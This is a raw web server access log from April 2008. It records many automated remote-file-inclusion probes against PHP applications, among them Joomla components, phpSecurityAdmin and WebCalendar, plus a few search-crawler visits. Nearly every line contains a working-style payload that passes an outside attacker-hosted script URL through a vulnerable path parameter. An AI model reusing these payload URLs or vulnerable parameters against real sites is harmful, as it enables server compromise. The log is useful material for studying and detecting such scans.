64.57.64.147 - - [27/Apr/2008:18:43:12 -0600] "GET /oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
64.57.64.147 - - [27/Apr/2008:18:43:12 -0600] "GET /logs/oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
200.1.202.61 - - [27/Apr/2008:18:43:22 -0600] "GET /logs/access_log.20080330//index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:43:26 -0600] "GET //index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:43:26 -0600] "GET /logs//index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
85.17.1.143 - - [27/Apr/2008:18:43:34 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:18:43:34 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
200.21.85.101 - - [27/Apr/2008:18:43:34 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.17.1.143 - - [27/Apr/2008:18:44:04 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
213.215.228.13 - - [27/Apr/2008:18:44:33 -0600] "GET /logs//index.php?page=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
213.215.228.13 - - [27/Apr/2008:18:44:33 -0600] "GET //index.php?page=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
72.232.122.239 - - [27/Apr/2008:18:45:15 -0600] "GET /playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:45:15 -0600] "GET /logs/playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:45:27 -0600] "GET /logs/playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:45:29 -0600] "GET //index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:45:30 -0600] "GET /logs//index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:45:36 -0600] "GET /playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.86.49.98 - - [27/Apr/2008:18:46:22 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.86.49.98 - - [27/Apr/2008:18:46:22 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.182.225.143 - - [27/Apr/2008:18:46:36 -0600] "GET /logs/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.182.225.143 - - [27/Apr/2008:18:46:38 -0600] "GET /logs/index.php?go1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.182.225.143 - - [27/Apr/2008:18:46:40 -0600] "GET /index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.182.225.143 - - [27/Apr/2008:18:46:44 -0600] "GET /index.php?go1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
70.86.49.98 - - [27/Apr/2008:18:46:48 -0600] "GET //index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.86.49.98 - - [27/Apr/2008:18:46:50 -0600] "GET /logs//index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
64.179.90.54 - - [27/Apr/2008:18:46:55 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:46:55 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:46:55 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:47:35 -0600] "GET /logs/access_log.20080413//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
210.109.102.108 - - [27/Apr/2008:18:47:51 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:18:47:52 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:18:47:52 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
83.223.101.14 - - [27/Apr/2008:18:49:04 -0600] "GET /logs/extras/ext_cats.php?dir_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.223.101.14 - - [27/Apr/2008:18:49:05 -0600] "GET /extras/ext_cats.php?dir_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
64.179.90.54 - - [27/Apr/2008:18:49:35 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:49:35 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:49:36 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
200.160.251.134 - - [27/Apr/2008:18:49:47 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.179.90.54 - - [27/Apr/2008:18:50:13 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.65"
210.109.102.108 - - [27/Apr/2008:18:50:22 -0600] "GET /logs/access_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
125.246.173.66 - - [27/Apr/2008:18:50:47 -0600] "GET //index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
125.246.173.66 - - [27/Apr/2008:18:50:48 -0600] "GET /logs//index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.216.238.230 - - [27/Apr/2008:18:51:06 -0600] "GET /logs/error_log//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:51:07 -0600] "GET /logs/error_log//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
82.165.148.225 - - [27/Apr/2008:18:54:05 -0600] "GET /logs/error_log.20080330//configuration.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
74.6.11.251 - - [27/Apr/2008:18:55:19 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.89 - - [27/Apr/2008:18:55:20 -0600] "GET /logs/access_log HTTP/1.0" 200 59701 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.109.102.108 - - [27/Apr/2008:18:58:21 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
75.126.114.42 - - [27/Apr/2008:18:59:07 -0600] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
210.109.102.108 - - [27/Apr/2008:18:59:51 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.130.79.136 - - [27/Apr/2008:18:59:55 -0600] "GET /logs/access_log.20080413/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
201.130.79.136 - - [27/Apr/2008:18:59:55 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
201.130.79.136 - - [27/Apr/2008:18:59:55 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
200.21.85.101 - - [27/Apr/2008:19:00:46 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.21.85.101 - - [27/Apr/2008:19:00:50 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.216.238.230 - - [27/Apr/2008:19:01:04 -0600] "GET /logs/////////?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 200 2002 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:19:01:07 -0600] "GET /////////?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 200 705 "-" "libwww-perl/5.79"
201.130.79.136 - - [27/Apr/2008:19:01:10 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
200.216.238.230 - - [27/Apr/2008:19:01:36 -0600] "GET /logs/////////?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 200 2002 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:19:01:37 -0600] "GET /////////?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 200 705 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:04:20 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:04:20 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:04:21 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:04:28 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
201.130.79.136 - - [27/Apr/2008:19:07:41 -0600] "GET /logs/error_log.20080330/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
72.89.191.68 - - [27/Apr/2008:19:07:54 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.89.191.68 - - [27/Apr/2008:19:07:54 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
75.126.114.42 - - [27/Apr/2008:19:08:03 -0600] "GET /logs/access_log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
75.126.114.42 - - [27/Apr/2008:19:08:03 -0600] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
216.145.14.142 - - [27/Apr/2008:19:08:35 -0600] "GET /robots.txt HTTP/1.0" 404 204 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
216.145.14.142 - - [27/Apr/2008:19:08:35 -0600] "GET / HTTP/1.1" 200 698 "http://www.whois.sc/evolutionarts.net" "SurveyBot/2.3 (Whois Source)"
208.100.1.157 - - [27/Apr/2008:19:10:00 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:10:00 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:10:00 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:10:21 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
72.232.122.239 - - [27/Apr/2008:19:10:38 -0600] "GET //nuboard_v0.5/admin/index.php?site=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:19:10:40 -0600] "GET /logs//nuboard_v0.5/admin/index.php?site=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
198.106.231.114 - - [27/Apr/2008:19:11:24 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
198.106.231.114 - - [27/Apr/2008:19:11:24 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.229.26.205 - - [27/Apr/2008:19:12:43 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.229.26.205 - - [27/Apr/2008:19:12:43 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
213.215.228.13 - - [27/Apr/2008:19:13:09 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
213.215.228.13 - - [27/Apr/2008:19:13:09 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.84.188.7 - - [27/Apr/2008:19:13:29 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
208.100.1.157 - - [27/Apr/2008:19:13:32 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
208.100.1.157 - - [27/Apr/2008:19:13:32 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
85.17.1.143 - - [27/Apr/2008:19:13:46 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:19:13:46 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:19:13:47 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:19:13:52 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:19:13:54 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
85.11.108.130 - - [27/Apr/2008:19:14:01 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
67.19.51.194 - - [27/Apr/2008:19:14:01 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.19.51.194 - - [27/Apr/2008:19:14:01 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
72.89.191.68 - - [27/Apr/2008:19:14:27 -0600] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.89.191.68 - - [27/Apr/2008:19:14:27 -0600] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
75.126.114.42 - - [27/Apr/2008:19:16:04 -0600] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
70.86.49.98 - - [27/Apr/2008:19:16:20 -0600] "GET /playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.86.49.98 - - [27/Apr/2008:19:16:33 -0600] "GET /logs/playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.89.191.68 - - [27/Apr/2008:19:17:32 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
72.89.191.68 - - [27/Apr/2008:19:17:32 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
213.203.209.2 - - [27/Apr/2008:19:17:35 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
213.203.209.2 - - [27/Apr/2008:19:17:35 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.22.11 - - [27/Apr/2008:19:19:04 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:19:04 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
69.59.22.11 - - [27/Apr/2008:19:19:04 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
85.17.1.143 - - [27/Apr/2008:19:19:28 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:19:19:28 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
69.59.22.11 - - [27/Apr/2008:19:19:32 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
66.249.72.206 - - [27/Apr/2008:19:19:43 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.206 - - [27/Apr/2008:19:19:43 -0600] "GET /logs/access_log HTTP/1.1" 200 73389 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.15.138.183 - - [27/Apr/2008:19:19:52 -0600] "GET /logs/access_log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
64.15.138.183 - - [27/Apr/2008:19:19:52 -0600] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
64.15.138.183 - - [27/Apr/2008:19:19:52 -0600] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
210.109.102.108 - - [27/Apr/2008:19:19:55 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
210.109.102.108 - - [27/Apr/2008:19:19:55 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
